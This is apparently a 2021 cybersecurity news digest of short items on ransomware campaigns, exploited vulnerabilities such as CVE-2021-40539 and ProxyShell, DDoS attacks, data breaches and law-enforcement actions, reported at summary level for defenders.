    Several Nation-State attacks were reported over the weekend where attackers are leveraging CVE-2021-40539 in Zoho ManageEngine ADSelfService Plus build 6114. ManageEngine ADSelfService Plus has integrated self-service password management and a single sign-on solution for Active Directory and cloud apps. On September 16th, 2021, we alerted members of software vulnerabilities that could be leveraged in remote attacks. We shared CISA's alert so that companies could apply patches to mitigate risks as necessary. Initial exploitation is obtained via web shells, including the use of Godzilla, which can be obtained publicly on Github. PaloAlto also mentions in their reporting that they observed the use of a new backdoor called NGLite, which is also publicly available on Github. Both programs appear to be developed with Chinese instructions, "used for redundancy and to maintain access to high-interest networks

    Chinese Spy Faces Decades in Jail After Conviction

    A Chinese intelligence officer has been convicted of cyber-espionage by a US federal jury, in the first ever case of its kind. Xu Janun, deputy division director of the Sixth Bureau of the Jiangsu Province Ministry of State Security, was found guilty of conspiring to and attempting to commit economic espionage and theft of trade secrets, according to the Department of Justice (DoJ)

    Operation Cyclone Targets Clop Ransomware Affiliates

    Interpol announced the arrest of six alleged affiliates with the Clop ransomware operation as part of an international joint law enforcement operation codenamed Operation Cyclone. Law enforcement authorities from South Korea, Ukraine, and the United States, joined their efforts in a 30-month investigation that was coordinated by Interpol

    Access to Oiltanking platform for sale on Raid Forums

    Access to a platform operated by Oiltanking is for sale on Raid Forums. Oiltanking is a multinational logistics service provider specialising in petroleum products headquartered in Germany. The sale is being conducted by the user mont4na. According to mont4na, this access includes user emails, usernames and plaintext passwords.

    FBI Warns of Increased Use of Cryptocurrency ATMs, QR Codes for Fraud

    The use of QR codes is becoming increasingly common because of the cost reduction; manufacturing companies realize that they can replace paper with technology. They’ve also found a place at conferences, restaurants, and other public places amid the COVID-19 pandemic as a sanitary measure to prevent sickness. Like any other piece of technology, such implementation has security risks associated with its use.

    CISA Urges Vendors to Patch BrakTooth Bugs after Exploits Release

    Researchers have released public exploit code and a proof of concept tool to test Bluetooth devices against System-on-a-Chip (SoC) security bugs impacting multiple vendors, including Intel, Qualcomm, Texas Instruments, and Cypress. Collectively known as BrakTooth, these 16 flaws impact commercial Bluetooth stacks on over 1,400 chipsets used in billions of devices such as smartphones, computers, audio devices, toys, IoT devices, and industrial equipment

    US Targets DarkSide Ransomware, Rebrands with $10 Million Reward

    The US government is targeting the DarkSide ransomware and its rebrands with up to a $10,000,000 reward for information leading to the identification or arrest of members of the operation. The US Department of Statement will reward informants who supply the identification or location of DarkSide ransomware members operating in key leadership positions.

    Ransomware Targets Companies During Mergers and Acquisitions

    The Federal Bureau of Investigation (FBI) warns that ransomware gangs are targeting companies involved in "time-sensitive financial events" such as corporate mergers and acquisitions to make it easier to extort their victims. In a private industry notification published on Monday, the FBI said ransomware operators would use the financial information collected before attacks as leverage to force victims to comply with ransom demands

    Trickbot IOCs October 2021

    A trusted third party to the Cybersecurity and Infrastructure Security Agency (CISA) has provided the attached information regarding Trickbot malware for your awareness and action. Trickbot is a highly modular malware, capable of performing a number of actions on a network such as steal information or drop ransomware.The attached “Trickbot” spreadsheet lists Trickbot infrastructure in use in September and October 2021. Specific dates and infrastructure are indicated on the tabs of the spreadsheet.

    Increased Ransomware Activity: Updates on Blackmatter and Recent Attacks

    Blackmatter, the ransomware responsible for targeting various critical infrastructure and industry across the globe have reportedly added a new tool to their arsenal. BlackMatter uses a ransomware-as-a-service model that allows ransomware's developers to profit from cybercriminal affiliates. Researchers from Symantec have discovered a new tool that they’ve named Exmatter, the tool targets specific file types from selected directories and then uploads them to attacker-controlled servers before the ransomware is installed on networks.

    Most Computer Code Compilers Vulnerable to Novel Attacks

    Most computer code compilers are at risk of ‘Trojan source’ attacks in which adversaries can introduce targeted vulnerabilities into any software without being detected, according to researchers from the University of Cambridge. The paper, Trojan Source: Invisible Vulnerabilities, detailed how weaknesses in text encoding standards such as Unicode can be exploited “to produce source code whose tokens are logically encoded in a different order from the one they are displayed.” This leads to very difficult vulnerabilities for human code reviewers to detect, as the rendered source code looks perfectly acceptable

    Ransomware Attack Impedes Toronto’s Public Transportation System

    A ransomware attack has disrupted the activities of the Toronto public transportation agency and has taken down several systems used by drivers and commuters alike. The Toronto Transit Commission said the attack was detected last week on Thursday night and was discovered by a TTC IT staffer who detected “unusual network activity.

    BlackMatter: New Data Exfiltration Tool Used in Attacks

    Security researchers have discovered a new data exfiltration tool designed to accelerate information theft for ransomware groups using the BlackMatter variant. The Symantec Threat Hunter team explained in a new blog post today that the custom tool is the third discovery of its kind, following the development of the Ryuk Stealer tool and the LockBit-linked StealBit. The researchers claimed BlackMatter itself is linked to the “Coreid” cybercrime group, which may have also been responsible for Darkside — the variant that led to the Colonial Pipeline outage.

    Hive Ransomware Now Encrypts Linux and FreeBSD Systems

    In a report from ESET researchers revealed that The Hive ransomware gang now also encrypts Linux and FreeBSD using new malware variants specifically developed to target these platforms. However, as Slovak internet security firm ESET discovered, Hive's new encryptors are still in development and still lack functionality. They also said that the Linux variant also proved to be quite buggy during ESET's analysis, with the encryption completely failing when the malware was executed with an explicit path.

    FBI: HelloKitty Ransomware Adds DDoS Attacks to Extortion Tactics

    The U.S. Federal Bureau of Investigation (FBI) has sent out a flash alert warning private industry partners that the HelloKitty ransomware gang (aka FiveHands) has added distributed denial-of-service (DDoS) attacks to their arsenal of extortion tactics. The FBI said that the ransomware group would take their victims' official websites down in DDoS attacks if they didn't comply with the ransom demands

    Ransomware Gangs Use SEO Poisoning To Infect Visitors

    Researchers have spotted two campaigns linked to either the REvil ransomware gang or the SolarMarker backdoor that use SEO poisoning to serve payloads to targets. SEO poisoning, also known as "search poisoning," is an attack method that relies on optimizing websites using 'black hat' SEO techniques to rank higher in Google search results. Due to their high ranking, victims who land on these sites believe they are legitimate, and actors enjoy a heavy influx of visitors who look for specific keywords.

    Data Breach at University of Colorado

    An American university is notifying thousands of former and current students that their personal information may have been compromised during a recent data breach. In a security notice issued October 25, the University of Colorado Boulder (CU Boulder) attributed the breach to an unpatched vulnerability in software provided by a third-party vendor, Atlassian Corporation Plc.

    Misconfigured Database Leaks 880 Million Medical Records

    Researchers have found an unsecured database leaking over 886 million sensitive patient records online. The non-password-protected data trove was found by Jeremiah Fowler and Website Planet and traced to healthcare AI firm Deep 6 AI, which fixed the privacy snafu promptly after it was responsibly disclosed. Deep 6 AI applies intelligent algorithms to medical data to help find patients for clinical trials within minutes. The exposed data included date, document type, physician note, encounter IDs, patient ID, note, UUID, patient type, note ID, date of service, note type, and detailed note text.

    WordPress Plugin Bug Impacts 1M Sites, Allows Malicious Redirects

    The OptinMonster plugin is affected by a high-severity flaw that allows unauthorized API access and sensitive information disclosure on roughly a million WordPress sites. Tracked as CVE-2021-39341, the flaw was discovered by researcher Chloe Chamberland on September 28, 2021, with a patch becoming available on October 7, 2021

    Microsoft Warns Over Uptick in Password Spraying Attacks

    Cyber attackers aren't just looking for software flaws, supply chain weakness, and open RDP connections. The other key asset hackers are after is identities, especially account details that will give them access to other internal systems. Russian cyber actors were not only behind the SolarWinds attack that trojanized software updates, they have also been using extensive password spraying techniques to steal admin accounts for initial access.

    North Korean State Hackers Start Targeting the IT Supply Chain

    North Korean-sponsored Lazarus hacking group has switched focus on new targets and was observed by Kaspersky security researchers expanding its supply chain attack capabilities. Lazarus has been seen using a new variant of the BLINDINGCAN backdoor to target political think tanks in South Korea, and to breach a Latvian IT vendor earlier this year. The infection chain used South Korean security software to deploy a malicious payload.

    Ranzy Locker ransomware hit tens of US companies in 2021

    The FBI published a flash alert to warn of Ranzy Locker ransomware operations that had already compromised at least 30 US companies this year. The gang has been active since at least 2020, threat actors hit organizations from various industries. The attack vector most used by the Ranzy Locker ransomware operators are brute force attempts targeting Remote Desktop Protocol (RDP) credentials. In recent attacks, the group also exploited known Microsoft Exchange Server vulnerabilities and used phishing messages to target computer networks.

    Kansas Man Pleads Guilty to Hacking the Post Rock Rural Water District

    This week we received news of another potential attack on a water treatment facility. Kansas man Wyatt A. Travinchek pleaded guilty to tampering with a computer system responsible for water treatment at the Post Rock Rural Water District. He was also charged with reckless damage to a protected computer system through his unauthorized access.

    New Activity From Russian Actor Nobelium and Techniques to Prevent Attacks

    Microsoft recently released news regarding the Nobelium threat actors, the same ones responsible for the supply chain attack leveraging Solarwinds Orion products. Microsoft says the actors may replicate a similar approach by targeting organizations integral to the global IT supply chain. However, with this go-around, it's possible that they may be targeting "supply-chain: resellers and other technology service providers that customize, deploy, and manage cloud services and other technologies on behalf of their customers, (Microsoft, 2021)." Rather than exploiting flaws and vulnerabilities, they may use standard techniques as initial access vectors, such as password-spraying and phishing.

    US Bureau of Industry and Security Bans Export of Hacking Tools to Authoritarian Regimes

    The Commerce Department’s Bureau of Industry and Security (BIS) would introduce a new export control rule aimed at banning the export or resale of hacking tools to authoritarian regimes. The rule announced by the BIS tightens export controls on technology that could be used by adversaries to conduct malicious cyber activities and surveillance of private citizens resulting in human rights abuse

    When Ransomware Hits Rural America

    Westmoreland, Kansas is the seat of Pottawatomie County and home to around 750 of its 25,000 residents. The town was a stop on the Oregon Trail and is littered with references to that network of covered wagons that carried hundreds of thousands of people across the American west in the mid-1800s. But in recent weeks it was the site of another modern migration—this one of data, stolen from Pottawatomie County’s computers by cybercriminals who paralyzed its systems with ransomware and left some services inaccessible to residents for weeks.

    Ex-carrier Employee Sentenced for Role in Sim-swapping Scheme

    At least 19 customers were targeted and prosecutors estimate that the employee received $2,325 in bribes. Following his arrest, Defiore pleaded guilty to one count of conspiracy to commit wire fraud. US Attorney Duane Evans said that Defiore was sentenced on October 19 and will serve three months probation, a year of home confinement, and must perform 100 hours of community service. The SIM-swapper must also pay a $100 fee and $77,417.50 in restitution.

    Sinclair TV Stations Crippled by Weekend Ransomware Attack

    Sinclair Broadcast Group is a Fortune 500 media company (with annual revenues of $5.9 billion in 2020) and a leading local sports and news provider that owns multiple national networks. Its operations include 185 television stations affiliated with Fox, ABC, CBS, NBC, and The CW (including 21 regional sports network brands), with approximately 620 channels in 87 markets across the US (amounting to almost 40% of all US households). This is the second incident that impacted Sinclair's TV stations in July 2021, when the company asked all Sinclair stations to change passwords "as quickly as possible" following a security breach.

    Analysis of a persistent AgentTesla campaign targeting the UAE

    Cyjax analysts have analysed a long-running AgentTesla infostealer campaign targeting Dubai and the United Arab Emirates. The campaign began in at least January 2021 and the samples we gathered continued, almost daily, until May 2021. We have also seen new samples compiled in October 2021. Unlike most AgentTesla campaigns, the targeting focused heavily on the UAE, with only a handful of samples using the same C2 servers venturing outside the region into India and Italy.

    US Authorities Issue BlackMatter Ransomware Alert

    The US authorities have released more details on emerging ransomware group BlackMatter, which it says has already targeted multiple critical infrastructure providers in the United States. The alert comes from the Cybersecurity and Infrastructure Security Agency (CISA), the FBI and the National Security Agency (NSA).

    The True Cost of DDoS Attacks

    Cyber-attacks against internet-connected resources have risen during the last 12 months – with distributed denial-of-service (DDoS) one of the most significant. DDoS has the power to shut down internet connectivity for an organization and act as a smokescreen for more malicious attacks such as ransomware. Yet understanding the financial impact can be challenging to calculate.

    REvil Ransomware Operation Shuts Down Once Again

    According to reports this morning, the REvil ransomware group has had it’s operations shut down again after a threat actor hijacked their Tor leak site and payment portal. The information was shared on the XSS hacking forum from one of REvil’s representatives named “0_neday.

    BlackByte: Free Decryptor Released for Ransomware Strain Summary

    Security researchers were able to crack the malwares encryption algorithm and produce a decryptor victim organizations can use for file and system recovery, “Trustwave, a Chicago-based cybersecurity and managed security services provider owned by Singaporean telecommunications company Singtel Group Enterprise, on Friday announced the release of the free decryptor, available for download from GitHub

    This Malware Botnet Gang Has Stolen Millions with a Surprisingly Simple Trick

    A prominent botnet known as MyKings has made $24.7 million using it’s network of compromised computers to mine and steal cryptocurrency.

    MyKings, also known as Smominru and Hexmen, is the world's largest botnet dedicated to mining cryptocurrencies by free-riding off its victims desktop and server CPUs. It's a lucrative business that gained attention in 2017 after infecting more than half a million Windows computers to mine about $2.3 million of Monero in a month.

    Over 90% of Firms Suffered Supply Chain Breaches Last Year

    Some 93% of global organizations have suffered a direct breach due to weaknesses in their supply chains over the past year, according to BlueVoyant.

    BlueVoyant surveyed 1200 IT and procurement managers responsible for supply chain and cyber risk management. Their research found that the number of breaches experienced in the past 12 months grew from “2.7 in 2020 to 3.7 in 2021, a 37% increase.

    Three More Ransomware Attacks hit Water and Wastewater Systems in 2021

    A joint cybersecurity advisory published today by the FBI, NSA, CISA, and the EPA revealed three more attacks launched by Ransomware gangs against US water and wastewater treatment facilities (WWS) this year.

    The advisory marks the first time these attacks have been publicly disclosed. The three facilities hit by ransomware were located in Nevada, Maine, and California in March, July, and August respectively. The attacks were the result of compromised SCADA industrial control systems.

    Chinese Hackers Use Windows Zero-day to Attack Defense, IT Firms

    A Chinese speaking threat actor called IronHusky has been exploiting a zero-day vulnerability in the Windows Win32k driver to deploy a new remote access trojan (RAT). The RAT is called MysterySnail and was discovered by Kaspersky researchers in August and September of 2021 after being seen on multiple Microsoft servers. The researchers found an elevation of privilege exploit tracked as CVE-2021-40449 being used to install MysterySnail. The vulnerability was patched in this month’s Patch Tuesday.

    Medium - Microsoft Mitigates Largest DDoS

    Microsoft announced that its Azure cloud service mitigated a 2.4 terabytes per second (Tbps) DDoS attack at the end of August, it represents the largest DDoS attack recorded to date. The attack was aimed at an Azure customer in Europe, but Microsoft did not disclose the name of the victim. This is the largest DDoS against an Azure customer since August 2020 when experts observed a 1 Tbps attack

    High - CISA Names 3 ‘Exceptionally Dangerous’ Behaviors to Avoid

    CISA has released the most common three bad practices that can potentially expose organizations to cyber attacks. After reviewing them, they correlate directly to large-scale breaches that we typically see and share every week. Devices and infrastructure impacted by some of these misconfigurations or ‘bad-practices,’ per se, range from products and platforms that are both cloud-based or locally maintained on-prem.

    Patch Apache HTTP Servers Now to Avoid Zero Day Exploit

    CVE-2021-41773 is described as a path traversal flaw in version 2.4.49, which was itself only released a few weeks ago. An attacker could use a path traversal attack to map URLs to files outside the expected document root,” a description of the bug noted. “If files outside of the document root are not protected by ‘require all denied’ these requests can succeed. Additionally, this flaw could leak the source of interpreted files like CGI scripts.

    Karakurt: potential new ransomware group emerges

    According to its site, Karakurt is a “hacking team” that compromises an organisation's data and then extorts them for its return. It is unclear if Karakurt utilises ransomware or if it only steals data. Based on Karakrut's claims, organisations will be notified of the compromise, and will then have to choose whether to pay an unspecified fee or have their data leaked via the Karakurt site.

    Bandwidth[.]com Is Latest Victim of DDoS Attacks

    Bandwidth is a voice over Internet Protocol (VoIP) services company that provides voice telephony over the Internet to businesses and resellers. Recent reporting suggests that they have become the latest victim of distributed denial of service attacks targeting VoIP providers this month, as a result there have been nationwide voice outages across the globe.

    A complete PoC exploit for CVE-2021-22005 in VMware vCenter is available online

    We reported last week that VMware had released updates to address critical vulnerabilities in their vSphere and Cloud Foundation software where a remote attacker could take control of an affected device over port 443. These types of platforms often store mission-critical data in the form of virtual machines, which could include domain controllers, proprietary applications, as well as data centers.

    SonicWall Critical Vulnerability Should Be Patched ASAP

    A security notice related to a SonicWall critical vulnerability in SMA 100 series devices has been issued by the company. The flaws are classified as CVE-2021-20034. If successfully exploited, it could allow a cybercriminal to delete random files from (SMA 200, 210, 400, 410, 500v) products and achieve administrative rights. The company is urging users to patch it as soon as possible.

    100M IoT Devices Exposed By Zero-Day Bug

    Researchers at Guard discovered a vulnerability in approximately 100 million devices across 10,000 enterprises vulnerable to attacks. NanoMQ, an open-source platform from EMQ that monitors IoT devices in real-time, acts as a “message broker” to deliver alerts that detect unusual activity. EMQ’s products are used to monitor the health of patients leaving a hospital, to detect fires, monitor car systems, smartwatches, smart-city applications, and more.

    Cisco Addresses 3 Critical Vulnerabilities in IoS XE Software

    It has been a pretty busy week for vendors of networking equipment. Netgear this week disclosed several vulnerabilities in their product line of home and office routers. Now, Cisco is advising everyone that they have addressed three critical vulnerabilities impacting their IOS XE operating system used to power multiple products, including routers and wireless controllers.

    Conti Ransomware Targeting Organization Worldwide

    CISA, FBI, and the NSA released a joint advisory today warning companies of Conti Ransomware targeting organizations worldwide. The alert suggests that operators are attempting to steal sensitive information from the United States and International Organizations.

    VMware Releases Security Updates

    VMware has released security updates to address multiple vulnerabilities in vCenter Server and Cloud Foundation. A remote attacker could exploit some of these vulnerabilities to take control of an affected system. A malicious actor with network access to port 443 on vCenter Server may exploit this issue to access restricted endpoints.

    CMA CGM Hit by Another Cyber Attack

    We reported a while ago that company CMA CGM had suffered from an attack that impacted several servers and websites. The company immediately disconnected systems from networks and powered off equipment to prevent the Ragnar Locker, Windows-Based ransomware from spreading throughout their network, "The Marseille headquartered firm is understood to have been hit by ransomware which paralysed much of its IT infrastructure.

    Ransomware Report: Commonly Exploited CVE’s Express the Importance of Patch Management

    A report published today clearly highlights the importance of patch management and securing devices exposed directly to the internet -- ones used for digital communications or applications that store mission-critical data, including VPN appliances, Networking Devices, Exchange Servers, Microsoft Office products, as well as Hypervisors. Over the past year, several vulnerabilities have been disclosed where proof of concept code was made available to the public. This essentially means that anyone with a moderate skill set and even nation-state actors can use the code to carry out attacks and study them for further enhancement.

    Microsoft Asks Azure Linux Admins to Manually Patch OMIGOD Bugs

    Microsoft has issued additional guidance on securing Azure Linux machines impacted by recently addressed critical OMIGOD vulnerabilities. The four security flaws (allowing remote code execution and privilege escalation) were found in the Open Management Infrastructure (OMI) software agent silently installed on more than half of Azure instances

    EMEA and APAC governments targeted in widespread credential harvesting campaign

    Cyjax analysts have uncovered a large credential harvesting campaign targeting multiple government departments in APAC and EMEA countries. Over 50 hostnames were analysed, many of which were posing as the Ministry of Foreign Affairs, Ministry of Finance, or Ministry of Energy, in various countries such as Uzbekistan, Belarus, and Turkey; as well as the Main Intelligence Directorate of Ukraine and the Pakistan Navy.

    Attackers Impersonate DoT in Two-Day Phishing Scam

    Threat actors impersonated the U.S. Department of Transportation (USDOT) in a two-day phishing campaign that used a combination of tactics – including creating new domains that mimic federal sites so as to appear to be legitimate – to evade security detections.

    Zloader Attacks Able to Disable Windows Defender

    As you might know, Microsoft Defender Antivirus is the anti-malware solution that usually comes pre-installed on systems that are running Windows 10. The attackers have modified the malware distribution mechanism from spam or phishing emails to TeamViewer Google adverts, which link users to fraudulent download sites through Google AdWords.

    Patches Released for Google Chrome Zero-Day Vulnerabilities

    As mentioned in previous reporting, Google has had its fair share of Zero-Day discoveries this year. A few of which have been actively exploited in the wild and leveraged in attacks. Yesterday, the company announced fixes for 11 different bugs, including two zero-days, "Google is aware that exploits for CVE-2021-30632 and CVE-2021-30633 exist in the wild,

    North Korean Hacker Recently Employed Social Media to Launch a Cyberattack

    The new advanced persistent threat (APT) activity has been discovered by EST Security in a press release from Kumsong 121 that was disclosed on Tuesday by the security firm. Instead of sending an email, the offenders utilized an innovative method in which they became friends with the victim on social media and then sent them an infected file to infect them. Having successfully hacked into a social media account, the attackers went on to find their next targets by contacting the victims' social media acquaintances. After taking advantage of the target's lack of knowledge, the hackers made friends with them by sending them text messages that were full of warmth and topics of similar interest, such as gossip, to make them feel welcome

    Apple Releases Emergency Update: Patch, but Don’t Panic

    This is a great report for malwarebytes, “The NSO Group says that its spyware is used against criminals and terrorists, but journalists and human rights activists are known to have been targeted by Pegasus attacks, along with political dissidents and business executives at the highest levels. The software can be used to collect all manner of personal data from devices, intercept calls and messages, and much more. If your work is particularly sensitive, it isn’t something you want anywhere near your phone

    GitHub Tackles Severe Vulnerabilities in Node.js Packages

    On Wednesday, GitHub said the company received reports from Robert Chen and Philip Papurt, between July 21 and August 13, of security flaws impacting the packages via one of GitHub's bug bounty programs, which give researchers credit and financial rewards for responsibly disclosing vulnerabilities to the vendor.

    Cisco Released Security Patches for High-Severity Flaws in IOS XR Software

    IOS XR is a train of Cisco Systems' widely deployed Internetworking Operating System, used on their high-end Network Convergence System, carrier-grade routers such as the CRS series, 12000 series, and ASR9000 series. It provides a unique self-healing and self-defending operating system designed for always-on operation while scaling capacity and adding new services or features.

    Windows MSHTML Zero-day Defenses Bypassed as New Info Emerges

    Windows Zero-day CVE-2021-40444 is being actively exploited in attacks. The vulnerability was disclosed on Tuesday with little details and is still awaiting an official patch. The vulnerability uses malicious ActiveX controls to exploit various Windows programs including Microsoft Office 365 and Office 2019, and can be used to install malware on an impacted computer.

    Hackers Steal Data from United Nations

    Hackers have broken into the computer network of the United Nations and made off with data, according to researchers at cybersecurity firm Resecurity. Bloomberg reports that the unidentified cyber-criminals behind the theft appear to have gained access simply by using login credentials stolen from a UN employee. Entry was gained by logging in to the employee’s Umoja account. Umoja, which means “unity” in Kiswahili, is the enterprise resource planning system implemented by the UN in 2015

    Malicious Actor Discloses FortiGate SSL-VPN Credentials

    Fortinet has become aware that a malicious actor has recently disclosed SSL-VPN access information to 87,000 FortiGate SSL-VPN devices. These credentials were obtained from systems that remained unpatched against FG-IR-18-384 and CVE-2018-13379. "While they may have since been patched, if the passwords were not reset, their devices vulnerable"

    Zoho Releases Security Update for ADSelfService Plus - Actors Exploiting Newly Identified CVE

    This joint advisory is the result of analytic efforts between the Federal Bureau of Investigation (FBI), United States Coast Guard Cyber Command (CGCYBER), and the Cybersecurity and Infrastructure Security Agency (CISA) to highlight the cyber threat associated with active exploitation of a newly identified vulnerability (CVE-2021-40539) in ManageEngine ADSelfService Plus—a self-service password management and single sign-on solution. CVE-2021-40539, rated critical, is an authentication bypass vulnerability affecting REST API URLs that could enable remote code execution. The FBI and CISA assess that advanced persistent threat (APT) cyber actors are likely among those exploiting the vulnerability.

    Attacks on IoT Devices Double Over Past Year

    According to Kaspersky, “attacks targeting IoT devices have almost doubled from the second half of 2020 to the first six months of this year” (Info Security Magazine, 2021). The company uses a network of honeypots to mimic vulnerable devices and collects data from potential attacks.

    Hacker Puts Stolen Data Online Because College Refuses to Pay

    The criminals behind the Ragnar Locker ransomware have issued a warning to victims via their own website not to go to the police or hire companies to negotiate the ransom, as all stolen data will be published immediately. According to the criminals, they increasingly have to deal with professional negotiators, which does not make the negotiation process easier or safer, the group said. It states that such negotiators work for or are associated with the police and are not interested in the commercial interests of their customers or the security of their data,

    CISA - Ransomware Related Threat Report

    The Cybersecurity & Infrastructure Security Agency (CISA) is sharing the attached ransomware-related threat alerts from a trusted industry partner for network defense purposes. The first alert details a threat actor mounting attacks using the Nefilim and Hive payloads and the second alert details possible pre-ransomware activity.

    Risk Considerations for Managed Service Provider Customers

    Going into the Holiday we are unfortunately expecting the inevitable, a large-scale cyber attacks against infrastructure and mission-critical assets. Given the current trend and attacks observed during previous Holidays, we are suspecting attacks this weekend but have fingers crossed that it is a quiet one for everyone.

    FBI Warns of Ransomware Gangs Targeting Food, Agriculture Orgs

    “The FBI says ransomware gangs are actively targeting and disrupting the operations of organizations in the food and agriculture sector, causing financial loss and directly affecting the food supply chain. These ransomware attacks can potentially impact a wide range of businesses across the sector, from small farms, markets, and restaurants to large-scale producers, processors, and manufacturers”

    This New Malware Family Using CLFS Log Files to Avoid Detection

    CLFS is a general-purpose logging subsystem in Windows that's accessible to both kernel-mode as well as user-mode applications such as database systems, OLTP systems, messaging clients, and network event management systems for building and sharing high-performance transaction logs. "Because the file format is not widely used or documented, there are no available tools that can parse CLFS log files," Mandiant researchers explained in a write-up published this week. "This provides attackers with an opportunity to hide their data as log records in a convenient way, because these are accessible through API functions."

    Conti Ransomware Now Hacking Exchange Servers With Proxyshell Exploits

    The Conti ransomware gang is hacking into Microsoft Exchange servers and breaching corporate networks using recently disclosed ProxyShell vulnerability exploits. ProxyShell is the name of an exploit utilizing three chained Microsoft Exchange vulnerabilities (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207) that allow unauthenticated, remote code execution on unpatched vulnerable servers.

    Attackers Are Attempting to Exploit Recently Patched Atlassian Confluence CVE-2021-26084 RCE

    “Threat actors were spotted exploiting the CVE-2021-26084 vulnerability in Atlassian’s Confluence enterprise collaboration product a few days after it was patched by the vendor” Atlassian released security patches to address CVE-2021-26084 last week; the vulnerability impacts Confluence, the company's enterprise collaboration product. The flaw is an OGNL (Object-Graph Navigation Language) injection issue, which allows an authenticated attacker to execute arbitrary code on Confluence Servers and Data Centers

    Cisco Fixes a Critical Flaw in Enterprise NFVIS for Which POC Exploit Exist

    NFVIS is the software platform that implements full life cycle management from the central orchestrator and controller (APIC-EM and ESA) for virtualized services. NFVIS enables connectivity between virtual services and external interfaces as well as supporting the underlying hardware. NFVIS is often thought of as a virtual software platform and has the following key capabilities; Platform management, A virtualization layer, a Programmable API interface, and a Health monitoring system.

    Sacked Employee Deletes 21GB of Credit Union Files

    A former credit union employee is facing a decade behind bars after pleading guilty to destroying large amounts of corporate data in revenge for being fired. Two days after being fired on May 19 2021, they accessed the file server of the New York-based credit union, opened confidential files and deleted 21.3GB of data, including 20,000 files and almost 3500 directories. The deleted files apparently related to mortgage loan applications and the company’s anti-ransomware software.

    Scam Artists Are Recruiting English Speakers for Business Email Campaigns

    Native English speakers are being recruited in their droves by criminals trying to make Business Email Compromise (BEC) more effective. BEC schemes can be simple to execute and among the most potentially devastating for a business, alongside threats such as ransomware. If a scam is to succeed, the target employee must believe communication comes from a legitimate source -- and secondary language use, spelling mistakes, and grammatical issues could all be indicators that something isn't right.

    FBI, CISA Warn of Potential Cyberattacks Over Labor Day Weekend

    “CISA and the FBI have released an advisory warning of potential cyberattacks that may occur over the coming Labor Day weekend, noting that in recent years hackers have launched dozens of devastating attacks on long weekends” CISA is also urging organizations to take additional steps to secure their systems and reduce their exposure to attacks. Specifically, they recommend proactive threat hunting on their networks to locate potential threat actors.

    Cyberattackers Are Now Quietly Selling Off Their Victim's Internet Bandwidth

    Cybercriminals have been increasingly turning to “proxyware”, an attack where the victim's internet connection is secretly used to generate additional revenue following a malware infection. “Proxyware, also known as internet-sharing applications, are legitimate services that allow users to portion out part of their internet connection for other devices, and may also include firewalls and antivirus programs. Other apps will allow users to 'host' a hotspot internet connection, providing them with cash every time a user connects to it”

    Cyberattacks Use Office 365 to Target Supply Chain

    By crafting believable looking fake Office 365 alerts, “phishers used fake alerts to trick admins into thinking that their Office 365 licenses had expired, (SecurityIntelligence, 2021).” The messages instructed the admins to click on a link so that they could sign into the Office 365 Admin Center and review the payment details. Instead, that sign-in page stole their account credentials.

    Ransomware Attack on Swiss City Exposed Citizens' Data

    The data released was claimed by the "Vice Society'' ransomware gang, according to researchers. While relatively new to the ransomware scene, Vice Society has adopted a common double-extortion technique to target victims. Once the ransomware gang has encrypted files and systems, it then exfiltrates sensitive data and threatens to publish the information unless the victim pays the ransom, according to researchers. The Vice Society ransomware gang appears to have used similar techniques earlier this month against Indianapolis, Indiana-based Eskenazi Health, which operates a public healthcare system in the U.S.

    Cloudflare Says It Stopped the Largest DDoS Attack Ever Reported

    Cloudflare said it's system managed to stop the largest reported DDoS attack in July, explaining in a blog post that the attack was 17.2 million requests-per-second, three times larger than any previous one they recorded. Cloudflare notes that the attack was carried out by a botnet targeting the financial industry. The attack hit the Cloudflare edge with over 330 million attack requests within a second. "The attack traffic originated from more than 20,000 bots in 125 countries around the world. Based on the bots' source IP addresses, almost 15% of the attack originated from Indonesia and another 17% from India and Brazil combined. Indicating that there may be many malware infected devices in those countries”

    CISA Urges Enterprises to Fix Microsoft Azure Cosmos DB Flaw

    CISA this week is urging organizations using Microsoft Azure CosmosDB (ChaosDB) to patch a recently released vulnerability as soon as possible. The news comes after “researchers from Cloud security company Wiz disclosed technical details of a now-fixed Azure Cosmos database vulnerability, dubbed ChaosDB, that could have been potentially exploited by attackers to gain full admin access to other customers’ database instances without any authorization. The flaw was trivial to exploit and impacts thousands of organizations worldwide”

    Kaseya Issues Patches for Two New 0-Day Flaws Affecting Unitrends Servers

    “U.S. technology firm Kaseya has released security patches to address two zero-day vulnerabilities affecting its Unitrends enterprise backup and continuity solution that could result in privilege escalation and authenticated remote code execution. The two weaknesses are part of a trio of vulnerabilities discovered and reported by researchers at the Dutch Institute for Vulnerability Disclosure (DIVD) on July 3, 2021”

    OpenSSL Vulnerabilities Impact Various Synology Products

    The identified OpenSSL vulnerabilities could lead to remote code execution (RCE) and DoS attacks (denial-of-service). These were dubbed CVE-2021-3711 and CVE-2021-3712. The impacted devices by these OpenSSL vulnerabilities include:

    Synology DiskStation Manager (DSM, version 7.0, 6.2 and UC),

  • SkyNAS, VS960HD,
  • Synology Router Manager (SRM, version 1.2),
  • the VPN Plus Server,
  • and the VPN Server.

  • Critical F5 BIG-IP Bug Impacts Customers in Sensitive Sectors

    “BIG-IP application services company F5 has fixed more than a dozen high-severity vulnerabilities in its networking device, one of them being elevated to critical severity under specific conditions. The issues are part of this month’s delivery of security updates, which addresses almost 30 vulnerabilities for multiple F5 devices. Of the thirteen high-severity flaws that F5 fixed, one becomes critical in a configuration “designed to meet the needs of customers in especially sensitive sectors” and could lead to complete system compromise”

    VMware Addressed 4 High-Severity Flaws in vRealize Operations

    VMware fixed four high severity flaws in vRealize today. “The most severe flaw, tracked as CVE-2021-22025 (CVSS score of 8.6), is a broken access control vulnerability in the vRealize Operations Manager API. An attacker could exploit the vulnerability to gain unauthenticated API access. The vRealize Operations Manager API contains a broken access control vulnerability leading to unauthenticated API access. VMware has evaluated the severity of this issue to be in the Important severity range with a maximum CVSSv3 base score of 8.6.“ reads the advisory published by the virtualization giant. “An unauthenticated malicious actor with network access to the vRealize Operations Manager API can add new nodes to an existing vROps cluster” (Security Affairs, 2021).

    Nearly 73,500 Patients' Data Affected in Ransomware Attack on EYE Clinic in S'pore

    Another ransomware attack has been confirmed, this time by a clinic in Singapore that exposed “personal data and clinical information of nearly 73,500 patients of a private eye clinic, (Straitstimes, 2021).” The third such reported incident in a month. The information included names, addresses, identity card numbers, contact details and clinical information such as patients’ clinical notes and eye scans, said Eye & Retina Surgeons (ERS) on Wednesday (Aug 25).

    Raccoon Stealer distributed via Twitch and Discord

